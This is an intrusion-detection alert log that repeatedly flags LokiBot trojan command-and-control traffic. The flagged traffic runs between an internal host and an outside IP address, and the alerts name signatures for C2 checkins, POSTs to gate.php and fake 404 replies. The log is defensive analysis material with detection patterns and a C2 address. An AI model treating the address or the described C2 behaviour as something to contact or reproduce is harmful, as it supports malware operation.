12/21/20-08:34:00.710942	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49222	185.193.143.118	192.168.2.22
12/21/20-08:34:00.993901	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49223	80	192.168.2.22	185.193.143.118
12/21/20-08:34:00.993901	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49223	80	192.168.2.22	185.193.143.118
12/21/20-08:34:00.993901	TCP	2025381	ET TROJAN LokiBot Checkin	49223	80	192.168.2.22	185.193.143.118
12/21/20-08:34:00.993901	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49223	80	192.168.2.22	185.193.143.118
12/21/20-08:34:00.993901	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49223	80	192.168.2.22	185.193.143.118
12/21/20-08:34:01.177423	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49223	185.193.143.118	192.168.2.22
12/21/20-08:34:01.452554	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49224	80	192.168.2.22	185.193.143.118
12/21/20-08:34:01.452554	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49224	80	192.168.2.22	185.193.143.118
12/21/20-08:34:01.452554	TCP	2025381	ET TROJAN LokiBot Checkin	49224	80	192.168.2.22	185.193.143.118
12/21/20-08:34:01.452554	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49224	80	192.168.2.22	185.193.143.118
12/21/20-08:34:01.452554	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49224	80	192.168.2.22	185.193.143.118
12/21/20-08:34:01.638469	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49224	185.193.143.118	192.168.2.22
12/21/20-08:34:01.876667	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49225	80	192.168.2.22	185.193.143.118
12/21/20-08:34:01.876667	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49225	80	192.168.2.22	185.193.143.118
12/21/20-08:34:01.876667	TCP	2025381	ET TROJAN LokiBot Checkin	49225	80	192.168.2.22	185.193.143.118
12/21/20-08:34:01.876667	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49225	80	192.168.2.22	185.193.143.118
12/21/20-08:34:01.876667	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49225	80	192.168.2.22	185.193.143.118
12/21/20-08:34:02.059926	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49225	185.193.143.118	192.168.2.22
12/21/20-08:34:02.621823	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49226	80	192.168.2.22	185.193.143.118
12/21/20-08:34:02.621823	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49226	80	192.168.2.22	185.193.143.118
12/21/20-08:34:02.621823	TCP	2025381	ET TROJAN LokiBot Checkin	49226	80	192.168.2.22	185.193.143.118
12/21/20-08:34:02.621823	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49226	80	192.168.2.22	185.193.143.118
12/21/20-08:34:02.621823	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49226	80	192.168.2.22	185.193.143.118
12/21/20-08:34:02.813173	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49226	185.193.143.118	192.168.2.22
12/21/20-08:34:03.371544	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49227	80	192.168.2.22	185.193.143.118
12/21/20-08:34:03.371544	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49227	80	192.168.2.22	185.193.143.118
12/21/20-08:34:03.371544	TCP	2025381	ET TROJAN LokiBot Checkin	49227	80	192.168.2.22	185.193.143.118
12/21/20-08:34:03.371544	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49227	80	192.168.2.22	185.193.143.118
12/21/20-08:34:03.371544	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49227	80	192.168.2.22	185.193.143.118
12/21/20-08:34:03.553006	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49227	185.193.143.118	192.168.2.22
12/21/20-08:34:03.833935	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49228	80	192.168.2.22	185.193.143.118
12/21/20-08:34:03.833935	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49228	80	192.168.2.22	185.193.143.118
12/21/20-08:34:03.833935	TCP	2025381	ET TROJAN LokiBot Checkin	49228	80	192.168.2.22	185.193.143.118
12/21/20-08:34:03.833935	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49228	80	192.168.2.22	185.193.143.118
12/21/20-08:34:03.833935	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49228	80	192.168.2.22	185.193.143.118
12/21/20-08:34:04.038430	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49228	185.193.143.118	192.168.2.22
12/21/20-08:34:04.292102	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49229	80	192.168.2.22	185.193.143.118
12/21/20-08:34:04.292102	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49229	80	192.168.2.22	185.193.143.118
12/21/20-08:34:04.292102	TCP	2025381	ET TROJAN LokiBot Checkin	49229	80	192.168.2.22	185.193.143.118
12/21/20-08:34:04.292102	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49229	80	192.168.2.22	185.193.143.118
12/21/20-08:34:04.292102	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49229	80	192.168.2.22	185.193.143.118
12/21/20-08:34:04.473880	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49229	185.193.143.118	192.168.2.22
12/21/20-08:34:04.727065	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49230	80	192.168.2.22	185.193.143.118
12/21/20-08:34:04.727065	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49230	80	192.168.2.22	185.193.143.118
12/21/20-08:34:04.727065	TCP	2025381	ET TROJAN LokiBot Checkin	49230	80	192.168.2.22	185.193.143.118
12/21/20-08:34:04.727065	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49230	80	192.168.2.22	185.193.143.118
12/21/20-08:34:04.727065	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49230	80	192.168.2.22	185.193.143.118
12/21/20-08:34:04.906800	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49230	185.193.143.118	192.168.2.22
12/21/20-08:34:05.184515	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49231	80	192.168.2.22	185.193.143.118
12/21/20-08:34:05.184515	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49231	80	192.168.2.22	185.193.143.118
12/21/20-08:34:05.184515	TCP	2025381	ET TROJAN LokiBot Checkin	49231	80	192.168.2.22	185.193.143.118
12/21/20-08:34:05.184515	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49231	80	192.168.2.22	185.193.143.118
12/21/20-08:34:05.184515	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49231	80	192.168.2.22	185.193.143.118
12/21/20-08:34:05.370030	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49231	185.193.143.118	192.168.2.22
12/21/20-08:34:05.631100	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49232	80	192.168.2.22	185.193.143.118
12/21/20-08:34:05.631100	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49232	80	192.168.2.22	185.193.143.118
12/21/20-08:34:05.631100	TCP	2025381	ET TROJAN LokiBot Checkin	49232	80	192.168.2.22	185.193.143.118
12/21/20-08:34:05.631100	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49232	80	192.168.2.22	185.193.143.118
12/21/20-08:34:05.631100	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49232	80	192.168.2.22	185.193.143.118
12/21/20-08:34:05.812973	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49232	185.193.143.118	192.168.2.22
12/21/20-08:34:06.072213	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49233	80	192.168.2.22	185.193.143.118
12/21/20-08:34:06.072213	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49233	80	192.168.2.22	185.193.143.118
12/21/20-08:34:06.072213	TCP	2025381	ET TROJAN LokiBot Checkin	49233	80	192.168.2.22	185.193.143.118
12/21/20-08:34:06.072213	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49233	80	192.168.2.22	185.193.143.118
12/21/20-08:34:06.072213	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49233	80	192.168.2.22	185.193.143.118
12/21/20-08:34:06.257531	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49233	185.193.143.118	192.168.2.22
12/21/20-08:34:06.518842	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49234	80	192.168.2.22	185.193.143.118
12/21/20-08:34:06.518842	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49234	80	192.168.2.22	185.193.143.118
12/21/20-08:34:06.518842	TCP	2025381	ET TROJAN LokiBot Checkin	49234	80	192.168.2.22	185.193.143.118
12/21/20-08:34:06.518842	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49234	80	192.168.2.22	185.193.143.118
12/21/20-08:34:06.518842	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49234	80	192.168.2.22	185.193.143.118
12/21/20-08:34:06.707419	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49234	185.193.143.118	192.168.2.22
12/21/20-08:34:06.975399	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49235	80	192.168.2.22	185.193.143.118
12/21/20-08:34:06.975399	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49235	80	192.168.2.22	185.193.143.118
12/21/20-08:34:06.975399	TCP	2025381	ET TROJAN LokiBot Checkin	49235	80	192.168.2.22	185.193.143.118
12/21/20-08:34:06.975399	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49235	80	192.168.2.22	185.193.143.118
12/21/20-08:34:06.975399	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49235	80	192.168.2.22	185.193.143.118
12/21/20-08:34:07.170943	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49235	185.193.143.118	192.168.2.22
12/21/20-08:34:07.433149	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49236	80	192.168.2.22	185.193.143.118
12/21/20-08:34:07.433149	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49236	80	192.168.2.22	185.193.143.118
12/21/20-08:34:07.433149	TCP	2025381	ET TROJAN LokiBot Checkin	49236	80	192.168.2.22	185.193.143.118
12/21/20-08:34:07.433149	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49236	80	192.168.2.22	185.193.143.118
12/21/20-08:34:07.433149	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49236	80	192.168.2.22	185.193.143.118
12/21/20-08:34:07.616414	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49236	185.193.143.118	192.168.2.22
12/21/20-08:34:07.882491	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49237	80	192.168.2.22	185.193.143.118
12/21/20-08:34:07.882491	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49237	80	192.168.2.22	185.193.143.118
12/21/20-08:34:07.882491	TCP	2025381	ET TROJAN LokiBot Checkin	49237	80	192.168.2.22	185.193.143.118
12/21/20-08:34:07.882491	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49237	80	192.168.2.22	185.193.143.118
12/21/20-08:34:07.882491	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49237	80	192.168.2.22	185.193.143.118
12/21/20-08:34:08.079046	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49237	185.193.143.118	192.168.2.22
12/21/20-08:34:08.329481	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49238	80	192.168.2.22	185.193.143.118
12/21/20-08:34:08.329481	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49238	80	192.168.2.22	185.193.143.118
12/21/20-08:34:08.329481	TCP	2025381	ET TROJAN LokiBot Checkin	49238	80	192.168.2.22	185.193.143.118
12/21/20-08:34:08.329481	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49238	80	192.168.2.22	185.193.143.118
12/21/20-08:34:08.329481	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49238	80	192.168.2.22	185.193.143.118
12/21/20-08:34:08.518978	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49238	185.193.143.118	192.168.2.22
12/21/20-08:34:08.775653	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49239	80	192.168.2.22	185.193.143.118
12/21/20-08:34:08.775653	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49239	80	192.168.2.22	185.193.143.118
12/21/20-08:34:08.775653	TCP	2025381	ET TROJAN LokiBot Checkin	49239	80	192.168.2.22	185.193.143.118
12/21/20-08:34:08.775653	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49239	80	192.168.2.22	185.193.143.118
12/21/20-08:34:08.775653	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49239	80	192.168.2.22	185.193.143.118
12/21/20-08:34:08.962409	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49239	185.193.143.118	192.168.2.22
12/21/20-08:34:09.232918	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49240	80	192.168.2.22	185.193.143.118
12/21/20-08:34:09.232918	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49240	80	192.168.2.22	185.193.143.118
12/21/20-08:34:09.232918	TCP	2025381	ET TROJAN LokiBot Checkin	49240	80	192.168.2.22	185.193.143.118
12/21/20-08:34:09.232918	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49240	80	192.168.2.22	185.193.143.118
12/21/20-08:34:09.232918	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49240	80	192.168.2.22	185.193.143.118
12/21/20-08:34:09.421864	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49240	185.193.143.118	192.168.2.22
12/21/20-08:34:09.685127	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49241	80	192.168.2.22	185.193.143.118
12/21/20-08:34:09.685127	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49241	80	192.168.2.22	185.193.143.118
12/21/20-08:34:09.685127	TCP	2025381	ET TROJAN LokiBot Checkin	49241	80	192.168.2.22	185.193.143.118
12/21/20-08:34:09.685127	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49241	80	192.168.2.22	185.193.143.118
12/21/20-08:34:09.685127	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49241	80	192.168.2.22	185.193.143.118
12/21/20-08:34:09.882205	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49241	185.193.143.118	192.168.2.22
12/21/20-08:34:10.151639	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49242	80	192.168.2.22	185.193.143.118
12/21/20-08:34:10.151639	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49242	80	192.168.2.22	185.193.143.118
12/21/20-08:34:10.151639	TCP	2025381	ET TROJAN LokiBot Checkin	49242	80	192.168.2.22	185.193.143.118
12/21/20-08:34:10.151639	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49242	80	192.168.2.22	185.193.143.118
12/21/20-08:34:10.151639	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49242	80	192.168.2.22	185.193.143.118
12/21/20-08:34:10.347271	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49242	185.193.143.118	192.168.2.22
12/21/20-08:34:10.607949	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49243	80	192.168.2.22	185.193.143.118
12/21/20-08:34:10.607949	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49243	80	192.168.2.22	185.193.143.118
12/21/20-08:34:10.607949	TCP	2025381	ET TROJAN LokiBot Checkin	49243	80	192.168.2.22	185.193.143.118
12/21/20-08:34:10.607949	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49243	80	192.168.2.22	185.193.143.118
12/21/20-08:34:10.607949	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49243	80	192.168.2.22	185.193.143.118
12/21/20-08:34:10.794916	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49243	185.193.143.118	192.168.2.22
12/21/20-08:34:11.045497	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49244	80	192.168.2.22	185.193.143.118
12/21/20-08:34:11.045497	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49244	80	192.168.2.22	185.193.143.118
12/21/20-08:34:11.045497	TCP	2025381	ET TROJAN LokiBot Checkin	49244	80	192.168.2.22	185.193.143.118
12/21/20-08:34:11.045497	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49244	80	192.168.2.22	185.193.143.118
12/21/20-08:34:11.045497	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49244	80	192.168.2.22	185.193.143.118
12/21/20-08:34:11.244723	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49244	185.193.143.118	192.168.2.22
12/21/20-08:34:11.501199	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49245	80	192.168.2.22	185.193.143.118
12/21/20-08:34:11.501199	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49245	80	192.168.2.22	185.193.143.118
12/21/20-08:34:11.501199	TCP	2025381	ET TROJAN LokiBot Checkin	49245	80	192.168.2.22	185.193.143.118
12/21/20-08:34:11.501199	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49245	80	192.168.2.22	185.193.143.118
12/21/20-08:34:11.501199	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49245	80	192.168.2.22	185.193.143.118
12/21/20-08:34:11.678664	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49245	185.193.143.118	192.168.2.22
12/21/20-08:34:11.935916	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49246	80	192.168.2.22	185.193.143.118
12/21/20-08:34:11.935916	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49246	80	192.168.2.22	185.193.143.118
12/21/20-08:34:11.935916	TCP	2025381	ET TROJAN LokiBot Checkin	49246	80	192.168.2.22	185.193.143.118
12/21/20-08:34:11.935916	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49246	80	192.168.2.22	185.193.143.118
12/21/20-08:34:11.935916	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49246	80	192.168.2.22	185.193.143.118
12/21/20-08:34:12.130193	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49246	185.193.143.118	192.168.2.22
12/21/20-08:34:12.410321	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49247	80	192.168.2.22	185.193.143.118
12/21/20-08:34:12.410321	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49247	80	192.168.2.22	185.193.143.118
12/21/20-08:34:12.410321	TCP	2025381	ET TROJAN LokiBot Checkin	49247	80	192.168.2.22	185.193.143.118
12/21/20-08:34:12.410321	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49247	80	192.168.2.22	185.193.143.118
12/21/20-08:34:12.410321	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49247	80	192.168.2.22	185.193.143.118
12/21/20-08:34:12.596600	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49247	185.193.143.118	192.168.2.22
12/21/20-08:34:12.859761	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49248	80	192.168.2.22	185.193.143.118
12/21/20-08:34:12.859761	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49248	80	192.168.2.22	185.193.143.118
12/21/20-08:34:12.859761	TCP	2025381	ET TROJAN LokiBot Checkin	49248	80	192.168.2.22	185.193.143.118
12/21/20-08:34:12.859761	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49248	80	192.168.2.22	185.193.143.118
12/21/20-08:34:12.859761	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49248	80	192.168.2.22	185.193.143.118
12/21/20-08:34:13.045886	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49248	185.193.143.118	192.168.2.22
12/21/20-08:34:15.289894	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49249	80	192.168.2.22	185.193.143.118
12/21/20-08:34:15.289894	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49249	80	192.168.2.22	185.193.143.118
12/21/20-08:34:15.289894	TCP	2025381	ET TROJAN LokiBot Checkin	49249	80	192.168.2.22	185.193.143.118
12/21/20-08:34:15.289894	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49249	80	192.168.2.22	185.193.143.118
12/21/20-08:34:15.289894	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49249	80	192.168.2.22	185.193.143.118
12/21/20-08:34:15.471557	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49249	185.193.143.118	192.168.2.22
12/21/20-08:34:15.721700	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49250	80	192.168.2.22	185.193.143.118
12/21/20-08:34:15.721700	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49250	80	192.168.2.22	185.193.143.118
12/21/20-08:34:15.721700	TCP	2025381	ET TROJAN LokiBot Checkin	49250	80	192.168.2.22	185.193.143.118
12/21/20-08:34:15.721700	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49250	80	192.168.2.22	185.193.143.118
12/21/20-08:34:15.721700	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49250	80	192.168.2.22	185.193.143.118
12/21/20-08:34:15.909937	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49250	185.193.143.118	192.168.2.22
12/21/20-08:34:16.167681	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49251	80	192.168.2.22	185.193.143.118
12/21/20-08:34:16.167681	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49251	80	192.168.2.22	185.193.143.118
12/21/20-08:34:16.167681	TCP	2025381	ET TROJAN LokiBot Checkin	49251	80	192.168.2.22	185.193.143.118
12/21/20-08:34:16.167681	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49251	80	192.168.2.22	185.193.143.118
12/21/20-08:34:16.167681	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49251	80	192.168.2.22	185.193.143.118
12/21/20-08:34:16.356204	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49251	185.193.143.118	192.168.2.22
12/21/20-08:34:16.612815	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49252	80	192.168.2.22	185.193.143.118
12/21/20-08:34:16.612815	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49252	80	192.168.2.22	185.193.143.118
12/21/20-08:34:16.612815	TCP	2025381	ET TROJAN LokiBot Checkin	49252	80	192.168.2.22	185.193.143.118
12/21/20-08:34:16.612815	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49252	80	192.168.2.22	185.193.143.118
12/21/20-08:34:16.612815	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49252	80	192.168.2.22	185.193.143.118
12/21/20-08:34:16.795536	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49252	185.193.143.118	192.168.2.22
12/21/20-08:34:17.056104	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49253	80	192.168.2.22	185.193.143.118
12/21/20-08:34:17.056104	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49253	80	192.168.2.22	185.193.143.118
12/21/20-08:34:17.056104	TCP	2025381	ET TROJAN LokiBot Checkin	49253	80	192.168.2.22	185.193.143.118
12/21/20-08:34:17.056104	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49253	80	192.168.2.22	185.193.143.118
12/21/20-08:34:17.056104	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49253	80	192.168.2.22	185.193.143.118
12/21/20-08:34:17.290444	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49253	185.193.143.118	192.168.2.22
12/21/20-08:34:17.553276	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49254	80	192.168.2.22	185.193.143.118
12/21/20-08:34:17.553276	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49254	80	192.168.2.22	185.193.143.118
12/21/20-08:34:17.553276	TCP	2025381	ET TROJAN LokiBot Checkin	49254	80	192.168.2.22	185.193.143.118
12/21/20-08:34:17.553276	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49254	80	192.168.2.22	185.193.143.118
12/21/20-08:34:17.553276	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49254	80	192.168.2.22	185.193.143.118
12/21/20-08:34:17.746177	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49254	185.193.143.118	192.168.2.22
12/21/20-08:34:18.009481	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49255	80	192.168.2.22	185.193.143.118
12/21/20-08:34:18.009481	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49255	80	192.168.2.22	185.193.143.118
12/21/20-08:34:18.009481	TCP	2025381	ET TROJAN LokiBot Checkin	49255	80	192.168.2.22	185.193.143.118
12/21/20-08:34:18.009481	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49255	80	192.168.2.22	185.193.143.118
12/21/20-08:34:18.009481	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49255	80	192.168.2.22	185.193.143.118
12/21/20-08:34:18.197959	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49255	185.193.143.118	192.168.2.22
12/21/20-08:34:18.454351	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49256	80	192.168.2.22	185.193.143.118
12/21/20-08:34:18.454351	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49256	80	192.168.2.22	185.193.143.118
12/21/20-08:34:18.454351	TCP	2025381	ET TROJAN LokiBot Checkin	49256	80	192.168.2.22	185.193.143.118
12/21/20-08:34:18.454351	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49256	80	192.168.2.22	185.193.143.118
12/21/20-08:34:18.454351	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49256	80	192.168.2.22	185.193.143.118
12/21/20-08:34:18.645733	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49256	185.193.143.118	192.168.2.22
12/21/20-08:34:18.916195	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49257	80	192.168.2.22	185.193.143.118
12/21/20-08:34:18.916195	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49257	80	192.168.2.22	185.193.143.118
12/21/20-08:34:18.916195	TCP	2025381	ET TROJAN LokiBot Checkin	49257	80	192.168.2.22	185.193.143.118
12/21/20-08:34:18.916195	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49257	80	192.168.2.22	185.193.143.118
12/21/20-08:34:18.916195	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49257	80	192.168.2.22	185.193.143.118
12/21/20-08:34:19.103234	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49257	185.193.143.118	192.168.2.22
12/21/20-08:34:19.360780	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49258	80	192.168.2.22	185.193.143.118
12/21/20-08:34:19.360780	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49258	80	192.168.2.22	185.193.143.118
12/21/20-08:34:19.360780	TCP	2025381	ET TROJAN LokiBot Checkin	49258	80	192.168.2.22	185.193.143.118
12/21/20-08:34:19.360780	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49258	80	192.168.2.22	185.193.143.118
12/21/20-08:34:19.360780	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49258	80	192.168.2.22	185.193.143.118
12/21/20-08:34:19.537757	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49258	185.193.143.118	192.168.2.22
12/21/20-08:34:19.810534	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49259	80	192.168.2.22	185.193.143.118
